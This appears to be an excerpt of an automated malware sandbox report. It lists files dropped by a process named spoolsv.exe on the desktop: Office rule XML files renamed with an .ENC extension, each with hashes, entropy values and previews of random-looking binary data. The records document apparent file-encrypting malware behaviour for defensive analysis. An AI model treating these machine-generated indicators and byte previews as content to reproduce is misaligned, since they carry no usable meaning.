                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...:K6....@Fz.3....Z......9....m....\..aY..X0.rUf0h..2.V.].Z...#..H.q*....}..i "..T.3.m(r.....Y.DCB....=%.q....FR.t.3.4.}W/..\.d..........z..Y..*.-OW..n.!..I|sdE]M%.....y...WGUT. .....g..Ku.1.|.i.....4.=^#..3Z..v;Z.M%. .r....V..X..M.1@2.{>...,..J...1......D-..yP?O.3.,....!8....K..W..8N#%v?.e.b...c...<S5......}...N.J..Z.+...8...FO}....~.R..o........,....QE..Y..2......$5..Yo=.....Q.........|.~._-..K'`.o.'..|...[...,Y.cZ....;...O.i..N)m....vo...A.....}...X....6..&.. ..%.4..d..'.jr.`F..Z.pm4T..h..K....].r ..j...%.g....vZL./.....B|..>5...Q.s.....E@H(sK.>..Q.@......q.y]........8.x.i.7E.F.....I.......,...&-..0.!....10\.j...E..j..v.eD.f.......)Ap..}.XE...l.....{...ed.y."..._.pE.Y.x....<x.)At.o.l.F.5.....m[...l.<.5;=].3/..+..MM.F.t~...y.k..V....I.N..y$o.F.....U&.X.'...Lb.t.>.]Ei.^2.~..R..w.].&.|E,._...&.mz...m...46..<$.S........).r.]|3.]....&.].+.5k@....B.~.^.t.l.T.|.M.......|..^....UN.!C7..f...{_..GH.a.>.bd..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703500v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.879119049903363
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/MmOrN76sq3A1yOaC8hZVccTUDC32/mzGIbMTIDrbe3pQzPyrlib:/MmO76b3ayOalh1wA2O6PTSrbe27Gib
                                                                                                                                                                                                                                                      MD5:BF729E2157E77E08FE0B206A5B59620C
                                                                                                                                                                                                                                                      SHA1:932325A5BDDA6194F92891A10C9B3DFC85DE29C8
                                                                                                                                                                                                                                                      SHA-256:FDB7C876EE29F3320D98D0F479976D6886744E867F8275D0C3EA4F272719E942
                                                                                                                                                                                                                                                      SHA-512:A171B7A6F4EEFD3FD9F7DC1834DCEA5B7F8B5B7686451932A2746112BC438FA19DB6942599FF64A350BBABAA0C1D80CC54DB8247BC8ED0A6B028F48181694846
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....^...........$...........v.......t....l..*2.@.....%_...........0...1......<.C.d.*:..0..6.>....q......b_`....k1......K.(6.6.....A.6....,dc....L...C.........s.o........9.yM....F.#.9.-.c\...S..x_.\... ..%..0.Q..j.....*w.5..k..H..Oy.....$.U...L......"...t.lQs..7r..a...a..s.&/.gA..ro......:1.h........j.o..H.Hd.C....(y7..k.ML...o......u.-g...V.....x....{.T.Jv..i].91.J...i..Cr%..&....8....Qa.....E.cZn.r!..V&..;..U..+...cE.Z."<.....S.v/..!......._..GS...l....M...Kb:\....,..y..@..u[.N.KnZlL..b...wN..1(..o.j..qm.j)j.T.B...K......p..D.Z.rfs...|...2w.l..c.X;.#..R...u..._.~.....2..[..B-..eN...-.z.....P...}..]-....L...q....T.B....).z.p.f..g.z{.]76...' ..u.v...9.a.ApjB\t..[kV.{'...V....i.]...z/....~....g.'.z..y<.F.mg.-...+.i.t.....)._...=...2ywl.*.$.w].|)..=....h<b....O...cw.&zQ....\q..5J[..vQ..Y."....k.....p..2..N...:...b].....3/....ci.z.ZC<....i9^h.|..7].EBx..W..O.L.q/'.....Z&H.<. .ZP...A./3G'<.U.e.[...f.@

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703501v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.853683696769297
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/S0x5hfe7n/BlvHr5xi68qhDUxdTkPLUl0hjceHf4gne66un:/SG5Ez/jikhDodus0hjcMfPe66u
                                                                                                                                                                                                                                                      MD5:9DBAAC0F29DB461CF956A6EFC119D794
                                                                                                                                                                                                                                                      SHA1:25CB89D6B6A2C5CB9CEA3369AA118E963AA1DBFD
                                                                                                                                                                                                                                                      SHA-256:81BF6056F9BC5730651844D2CE7691D316EB54F4E13222BDEB7F58430B646515
                                                                                                                                                                                                                                                      SHA-512:AA45A7FF317ABE26D7A9AB8936B892811E0401D93C5AC0B7B8C3347FA9FF31546A8A59719DA0F60F1A446C2AABCFDB23C7E8F0ED6B26DA2A090F2F6D70166ACE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..Q9D.B.]..ks.:.#e.L$....yw....7X+>Q.F..=.m..I,+TP.6..}..[......!$.....`&..T.&.}.v........J1......T.3...k..C4q..8..)....'.3{......N..(j{...iy..9..}.h.&.....q.1.g ......rt.=...sSk./.....7..,?.c[.d...R.IdzT.P...rW.../XFO..f...S.E...V.....~.m..}.}.....Yd..ka.\..|..%.fRv.L....8b8.R1..i..>.Gf...l.i..K.H3...C..`..^}'...}...(.][R.6.........q..../P.CZY.L.<.aB...T.X_.A.As{.N.2....<>.q.../[.sa..is....:.\8HM.....|m....[..N~_.p."q.j.eB:..?..|k......Kq..U....n.E./..lM.YOhU....}3:.2....j|D."7.$.j..ug>.D.v.<a.PZ...F...L..#..?...[.q....E....fT.....cC.....A..%..w...3...xz...>#.../....]I.r.......UN..r... ...C.~...=.n....T..7v.....F.......v.i.ya..[s...%..&]........0.NL.Pr}.c..r........9oQ....:\.nCf...Uc....F.f.(W'..,.._...+.g.4....0...&..Fe......q.q..r.#.....;|R..{.....9..\b.....!.R....!.S&.........\..@(..&.M.bV..l".<...T..:v7....d'BJ}.........K./.z.Y...Y.byq.`1.l...;..}mk?..7.s.N...g.R...9##..*n.Bl.LZl..X..'

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703550v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.85221645785651
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/Tk8FaxnY0cEtAmPBir88zIxgdGCkyelAxzRIzRl1y95lszyJQPfEubBQu4HK2WH:/nA9cEtB5ir8SIxgd9kyelAxzRIzRbyK
                                                                                                                                                                                                                                                      MD5:1346077BF424B2D069C5CCA40A8B54E9
                                                                                                                                                                                                                                                      SHA1:62B4EBB26FFFFDB07FA46C6247609748D35AB8F0
                                                                                                                                                                                                                                                      SHA-256:C4DF28ACD261F08EACBE2CCB2EF47B7A1658B3CD2399973A30D0338FF92954EC
                                                                                                                                                                                                                                                      SHA-512:AA4DAF84A5C6D44983B4391AABED2296C5C6C036252755B95901C1A34E1D0E67CD6B1A4C9D1FA59DD0DC46D7F886AD43212BB0F4697568B38A63EF1A4B4B5CDC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..c.O.t|.(.B..........%..YG.L..f..7i....Pe......Xm6.......Y<.b....vmM.W..fZ...[...\..!a~nf....%,x..h.;...{.>.0......{%....]...........5..T[gW.U.?s.]~C`...j_ WnXU"......._.;....3.q..J.y."..?e.k<..w.N......h.1 .......O..2....8.E..!..ax2X..q.#c..l...p}./..9.RK.,.L....Z.0..U....{...o,.Y.[..,.mm&y..F....R?_H....&...e...w..?..t...{..gN0..wT.....s.).....V\'....P......bLk.r...oO..,.. .]Mo._....R.N.h..m..8].r..,D...Vl.}.$..v...._H.VO..n...u.......3J..rra.....8....]. .w.+.F..YM+.8.........~...B@V..\.v.kl?bg..E.n$o./..,(G~.`.5s.7....h.h....).v.)I.w...;4.....]....|..."...._t..g.!.i..F.{E.GS..~"....B.VBe.H.\J).v..?.=.j.f.......)-P$.i.....j.Q_!?v..P.@....,~~..1.t2Qt'j....`.=.......(.V...^t..T..[{7.........sA..I5&.{@.....,...l....+1.. z ..J!.w....../... 0.....].......'i..."%....R.....2..*.....F...$u..cK.Q..s..:......yWQ.......'.o..9..s....M=<t.GG......YO.&..&..Q...e...Gw..R6...[.........:Z.:m.W...:.Q...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703551v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.8594643223079705
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/mF+dWKSYrGpntSG/zldjiDNbRqJM3MfbK9YumBycMs56BF201M2YK5x6:/fdWKS3pT/iZbP8TxCcKEATA
                                                                                                                                                                                                                                                      MD5:ED64E714B8620012415AE7C006FF826F
                                                                                                                                                                                                                                                      SHA1:B33B756F4A8BE45C1CD86D14EC8B78E720D825C5
                                                                                                                                                                                                                                                      SHA-256:92E3124F86FE8F0970F0DD1CAF4E29CDF984B5A026337E3D7A4305D685E90773
                                                                                                                                                                                                                                                      SHA-512:C95E73787091590A29DF9D3818B3A4BF54D68790D2A6E1F13507AAD0658FCDDCB4CA9BA146CE143A7452DBD9070A3FCE554639BD31F7B0BF5F8782B951C313CF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.9..i.......=......V.......#x.$...'..Z...m3..B..............Xb.I..\Y...?$."....$m"2.[....O6.u-...C...CR.U.{.."'..2.._S....1......[.i..#!.4;H=M.Pf.ep..C]k.L?.!...u......5.c..W<-.y2.t....~~..:...j..P..U/.o.Y.K.`..s../.pB.......;.q...88.X.q.L&.0p.#../.&O...Z?......>...'a............vTe......PC.&{.<.B+.Y.D...UVoGh..v..i...Fz.Q.$.=:.J6-[0*......G..M:..q[.......MM.;.......O1....".W.....|.g?y.^G.E,.n./y?.D....)......v..j...{..V.........:O.y^#...0.g.n.^a..^.*....P..M..R.p.....r.k.C.........U.iy.....|F.*..w..?...&.;4zs....n.A....(_.y......f+..r........Y^Qj4.......=..y..._..`....Y..$..U.o..tc{._H69......V.l.;...6....gh.B..K..n..@V[W.9W..2.n.!h.N%..R...S.k....r.\6..v..Z...YH:%...b6...I.....2....9.m...I.F$..$..y.....`...UEFd.EbXr.....~..b..`.._..}.!.k\...Wbc..2.E.....B...!...?.M......|.2.a../*4sz...W8k..z...32....#...J.nc.%C.t.J*....%...G...c:..(7..s.&.$...c..'......!.A..Ic........(Rz..L..t$.F....~..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703600v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.831511032736749
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/n2w0gBx6kW1aJT5F9ZtpmvRP/C7G3IMykTIy6EjSwDJQfuKMMslpTNFZg9Y1:/n2w0gXlpeBC7GTRIJED+2KVslpTNcY1
                                                                                                                                                                                                                                                      MD5:8320011CA5A060E08355164CE9AA3BA6
                                                                                                                                                                                                                                                      SHA1:FB7E6BCF2C7994FF1D33EF5605408A66B2F0B39E
                                                                                                                                                                                                                                                      SHA-256:955551B99B241767CCAA339393A412FB31B2380BCD8039615143E1A2F62FA5AA
                                                                                                                                                                                                                                                      SHA-512:68D4896405073B48E04895DE5741B75AD4C88E595EEACC1517087C3B8686B8C4BB868306123FF43B9BDBE8238F9C4ABF8D7A4CD69E5393739B836165CCAE2D2E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...eg.|1+N,.D!>tt_|.~...4.8j.[.7.d.Z.Q..b....E0...2\l.....l......m.*h~..r.Qw.|...[..<.;.3u..Q..4..#..".2....9.'6,HfZ...o;.$>.NN."..Hgb7ko*....\.@.D.x.....?.AWq..kfY...@..W6...vu.....S3~.Y...mO2......4@......t...es\.G<.w.8qb....@}...|"B~...81..\.O.j........;.4-....>...8.]...".*...x...O9.|p..y...`X.....2..e.......6.cxo.y..B2w....\`.08...l.......\._...X..R.J.g.....d..m2.....}P..zI.C.^.O..(w.NF. ..g#..P...&.....y..8S..uw.;k.E.x.....q.Hu.....d.K8.t.$Ke.......y..^..tD.I....?.).E.k.6x.b.|.^o....U'.Y(T..&%w......;:..9...pb......?/o[_.....G)...d;.iuZ...{.;....Ukr.+..%...*..\.n;..%l.*..4...B.0.vH..jmE.......HU.@.W[.N...s...M......XF..E.T..g!......1. DI?....S................xl==9T@...0....|_..]....s.......HKi...O.B..\.Dd...B....>H.;Mx..R_...3....K!....Z>0x7Rvi..I.A..W.\^z..dT@kE..R>.-..6H.`.$.RpK.8...0..9`...D=....X=..f...0.(zV.r.....wFK.Jq..... ..#.l.\1"IT.rWW..F..C....KG..r..b@Au6.....?.....".}~..2.W..bN&..:..u...#.\..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703601v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.878049632796008
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/Y41bqHPwc1pdLy1aYHyKRg/5PUSgBhhHG99UEky4e6UcwzLMeCCQI:/xUHPwc1nEaYSx9yhHq9UEky1cwzLtcI
                                                                                                                                                                                                                                                      MD5:B7089D36CA6637DAA508F1561BEF6ECE
                                                                                                                                                                                                                                                      SHA1:707D3656528A26A1F8C44E8AECAF6A6DE6CEE2DB
                                                                                                                                                                                                                                                      SHA-256:791CA09010BF2E190AC8CB86BF3A96351BE768355992FC49754D499E56521C58
                                                                                                                                                                                                                                                      SHA-512:7803E1F952F3016FBBC613520017E86A13B0FA1C54A9E2096B7BF35FD9BC2CD1739D39A629C2E1D0769323190424A3B345C7424516A87EB8491FE34E0F05E45B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.{M.S.j...np......#.....g. .i{.D........F._.Z.F.k..D.;...TU.J.2x.u,...+....c..6..:x.`"{z7#l...h.t.R.,_.I,.G..K.l..t......)..^...]..bi.8.]eSD 4i...QG..o.b.......qF...I.r..-...d..;.Q.G.s....C.Q+k..X...g ...?w...HU.2...G..m.T.....C._...g.M..Y..1e{;C...\T..f.s;..y"....2.Z...h..4..NvR..f.....&!mP~...Rzbl@...RZ+..>.Z..F..W.P...&...z.7...v.}.I.x!.n%.....JI|94....G..'{F.=....zf.4..<a&3.W...lz.H..x.?.......l+.Ak.x>7...../%0.....TP../<...,.|6....Lh....L%...`..."......=T.w..L......f^...5.a..=..$jd.i!.@...!.>.)..e.2I.4.Y..)...~.V5..H+.W.KH....e..=wE[v5.x.....dO...!..H....^9..[....v-......E.-5..=...1...%.7...............S..z.E..w"Dl./..yB......[..........g.m.z....4.+E.6m....\....*.!E....^.....U.0...3.WAe..7~...C.\......"G.........5?@..jQ...T..}..ts[.+.X..?.6|9M....n.Mp6../.,....L3A..>..d...%.0...d.B.Q0Z..C,.67..d./...<...1.eW.P;............i...'..Ak....UW][.:Q..ab...r..b..:..Z..C.%.QdH.^[[.PJ^m.6.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703650v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.875380764250416
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/S6MiLVbP8hmUNuypIiOH8z9TBcRY4RCEi3nM57nirNT/Hjm+ldiEWiGcqA7zWXB:/S6M+Vj8f0yE8ybRHocDihTtl4lcAKW
                                                                                                                                                                                                                                                      MD5:EA4AC38222701C485EF1756D1DF04798
                                                                                                                                                                                                                                                      SHA1:1F3DCE0049A371F0B6B1FFE08B4E51056A8F826D
                                                                                                                                                                                                                                                      SHA-256:C9E7D2A47EDB64CA459BF024F9F8B740D0C39025EDD834CA0840A0FA504B96B2
                                                                                                                                                                                                                                                      SHA-512:A55C187038134E3A3DA992788DD14DA94FE2EA300F65BC1485540669B6676EA8FAFDF0E4F8F38BAF63A2D8AB14DC5B1B977C9F2D3E7CEC23547CC3A88F8AA1FF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...`...R`&..mG...9.q.y..M...%#uF.~.a.ji.D...:..v..l.W...C_q.Nz..(.c....&.....U.vG.z.#.f.7..3.a.|....`..`..w.T!....:.7.H0..y~<....gw.+.\..2.7....]@..j!]Hp@..)G?zj..S......... f....8W.._.<...p.MP-..I1...g.h,...(8.S...,.q|../.....C.%..~Y..K.CrNY._..}.' .V..;...@...i..<hT.m..q..'@.$..I. .u..g...3.......}.(.........A$...=...4.....K1..z.....~....3#.y..Z.3.._A.7)..s.....z.. ).;...7H.[.C...Q...s.4.R.G............#u.6....{C.O.R..F;.1#.Iq...[.|.I..k=P.....z."..S<..1K...^J......-I.o.+:...cV..W^..?...,[....Q..A...%$...7..:@V....w......_.......=...%..[.Vnt.<..h..[.f2.Q..f5....8..9>.l#.r......N..#..J.'.>.?.,.s.[3u4...v.<.....>.SKJ....RE..-...a.<..?F....'>. ..6.q..(x.Vp.MB..%..........V..t.6.0&..4U.&.{.K..D=.k.E..........z.hv..,.1.}o....AW..>....<....E.\....}{.r.TA..92{.e^:.M..b....}.4.{h.].w9..F..q......&..1..#yS.....WgA".q.C.m..:%.`.7aVY^...].wB.#I.N...tva..-.m..V..V..2..<.D...;....J...A8OI....S........h_.=Q._v.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703651v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.867959944875358
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/2tQcW0r0x4AogSdYay3+MzMqpvMJIvdzlOuZ2FHFF84NH4C0SFo4HiwSDM:/KQc6ndSia0Mq5d8uuHrx4qFixM
                                                                                                                                                                                                                                                      MD5:2A2D0965501CFD8F5EEE86486A11AC9D
                                                                                                                                                                                                                                                      SHA1:4C563A15B8ED48D9F9CFCB4ACEBD10835A97806D
                                                                                                                                                                                                                                                      SHA-256:0C5575483516E72AFF7AA0FE9FDBC31A533C76E5E2DD68F3E7307B1644D84992
                                                                                                                                                                                                                                                      SHA-512:A112F00CD175036DB41FA0CD69DD47A20A271BA62887E53036915B187D78DAF6FC4241D49C86AFBE7C00A1D3E2587D75E5D157EDD6F521FAAAAAF872202E8098
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.o....x8.3.=!n._.P...M..Ti....F.%X......Ym.`x.B..p=cIE.....#....j...[..4....3]fU.0....L.a...>.Z..4..WnO.`..5].N......u.....&..R....G'.......u..E..f.....u.3.4f.....6....P........)L.Kq,o..!+/.Z...:<[..ve...4.S...D..5.......B.*.......Za..Y......1.)Y....Tx.<q......_.F...x...6g..?..F.ZN...+.4.TIwH^o.P..c..a.<<V....A....)..N.`.......J......U-... ...3..v......._x1-m.*R.QR.Z.._....|...nt.....v.B.`...Q.....v.8~F?Yk..|(`..u....yH..4.9..J&.n.%7.RR...%...(...k....E..>5...N*.r.:..W.+.l.As.g....A<..=.J......A....R&..n.j.\.|..>........(..]Q.`...pf...]s.[..o...{.C1|.Vs{....).{.d+Y]..w.....L.V[\...)...".....6....[.c...1g4..HC%a..&&......>o..(..A;...h.....@&.HE.7.o.s..au#l....c_.!..J..V.`.Y".e...V.._3J...e%.7..b.g.zQ.<...q..m..1.g.....q..".^...m.........B.)_a2...d...L.k...Fl.]..f.Fi'Z.?R..a.t..u"FAU?..x|].Y..q..U+@=.!....p.6.q..."....n.!...u!.q..m.1......."..........a..%(.DQ.-.x/.Br.8.qQ. ..;bLx...@.dPw.L...U..~.p.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703700v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.844544115265827
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/bKOhSzYqmymsTFdX1I2BXpTSJVFFc/9XrLQo7hQNQAXRKCfhB1CVuNpHQ:/3onHmsZXzOvFc/9bLQoFQNn55B1Csbw
                                                                                                                                                                                                                                                      MD5:AC7665E0DF083BF56A65ACA090513910
                                                                                                                                                                                                                                                      SHA1:AFD049C64A8E0A9CBC7CABFA505C112A03698189
                                                                                                                                                                                                                                                      SHA-256:D150B76778A2E160484227067399671A4BA01F8CF0C8D7BEC402617578F43D03
                                                                                                                                                                                                                                                      SHA-512:1F3FFA23BA5E9851165BDDE30FF2F080FCC1B61B0A87763AE5CDD520A277C27FF14D06F7BECE42EC0DC8281E725B636B697F275EFCF73D40AAA0E4516A129B75
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...=a..B........9z....rN..\.N?....(y.t..?+=.G...Jy.....(.=&. cK-.)...#....H<@V....D.;.c..k...T.yn}..}..!..L....).e.U....!...H..O:.5....}\..p.R....9.y.a..........e.xH....D..-..M.d~.9=@\s.qq.XR ..+...."(.._.eCI8kC....T..C{....?..7 :.l.\<..[..o<a..y.Z).f...^.i9...p.\........m.:.vV.A.{..)h.na...b.......Uc4P.....C9...`55u.....HNQ.%...q..b.qs.:y....%S>Q. .p.Y.......m:..3..9P1.rC7...sVyF...C...b.,A..n.....J.B.....2./..3.:...d$../.O.....b .Bc...b..f*]Q......Ak...v...7...4.U....?..%....i$...p4.;.J...\...,.DQ..o._.Q... W.cT8...zy..-.V..Z...{.A...c.V...C....P.$...qrV.....=.2....F.....E..B.6).2..Wt.....CF....... 1..N..3.....)q....D.s............2....r....GC-.ZHjJz"....x.".K.......G..B.q...\..|..P.J1.v.`n..7.....t....#...U.q.n3.N.,.....u..`.....5....v.....|..1..`)........Q.....,Y......p..wh.s*y....G..R..1....^.(..t/.^)...J.....T.u.........A....O2..f...g....>...9..Q.p....+..$....1.W.q...eM.k....l....f.T.R..+.D.#;r.8

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703701v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.875981116009683
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/Zh11AH/uPdWIamaiNyaBpPrF02DhdkKcVnCIP/FnRp+bAjfEJ6:/ZhwHQdWIHjyaBpPrFzhdkFn99+bmx
                                                                                                                                                                                                                                                      MD5:68A3B86DD449BA556812442108C194C0
                                                                                                                                                                                                                                                      SHA1:D7FC7638E1D5FC6FEBF0766D823996CD51EDDB58
                                                                                                                                                                                                                                                      SHA-256:44ECF72A757D212C6F99224FA531277C54C08E879252F7DA60CF2DE554A96107
                                                                                                                                                                                                                                                      SHA-512:6F50AD9CAAEE258791170DC4A11BC7C419654E4DFA49F1D0E6EE73E86223DFF4E8A508964B5DD141F8F2AB7FB5210D41A03CE36B22FEFD487DDCE13EE5EDB1B6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...<.....l.#..(..#p...C.b.tmi.....x.,y.A).N....N.(.o....$).%..."Y'.z...r....@d....L...%....ks.<p..3.,.[.;..>.u".^.;......>.B{.....-7B<.,..h"SG.$f%j.!..$.....8.<.v....a....%.N....*.~....3..+.Q.]J.D.......}z=.9&h.....~8..T...Apz......(~xF...+..?(...._y.d..O.I.6..B........A.".4.b.....P@m..o.P&.!.#.:h.y9..........yC.V\..T.,...<.@.,......}r..?n- 4.G...#.1i7r,..t".........M....4.)a..0/>..`.%0.[..BD]..%j..]....&...b...,;.Kd<.oCO)-3m....`...X..m......2.$D..n.(...<...}.g.....$n./Mz..._())....)....4....3.).......[c......w..x9..+IST.x..`..[...3/..*(.~.X...u.P{..;.?.v..1.... ...+.....]..%"....a./.!..vXe7.......UE..s...,T._;N...E....c-...l...2*m^..m.Lw....S"".b.`...O...0..C......y:O.......Q`./...<..D..Q ..J..e\....Y8.E.}..f.....*.....3...6........8.^.....F.Ma.G.i...m..b.N....?....M.].oV.r..Q.^.l.R`...Eh.!.,.$....5.n.<.t..A..6...5..H..n.....I.T.......6.^...q~.W..c.X...r....2..h3..4.z..I.".D.3..z.Z

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703750v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.8662018022046265
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/FHkco4keNIKcmTkcH9xnvLCH3EkSkuSvVo9bCNPD6bCQpg9/aFCA:/FEGkeNIKcmTt9xnVevoWD7TA
                                                                                                                                                                                                                                                      MD5:0528C21A1126DEF9850B593BEA703A55
                                                                                                                                                                                                                                                      SHA1:5C19A16140D8DA06E1DD154D73C31D3417D285AE
                                                                                                                                                                                                                                                      SHA-256:73F27AE71F2B9D8F18A0FCDBAA2F282FD3F596EDD80B477E4F566BD2DD23FB72
                                                                                                                                                                                                                                                      SHA-512:267A5D8D4B4B491723093972DD5DEFF63578C28D2409CFF9349F370512BA785D20C7DCB14C296735CC2C15193CA865CAA59F893CE2909FD6BAB41A6B34F6D386
                                                                                                                                                                                                                                                      Malicious:false
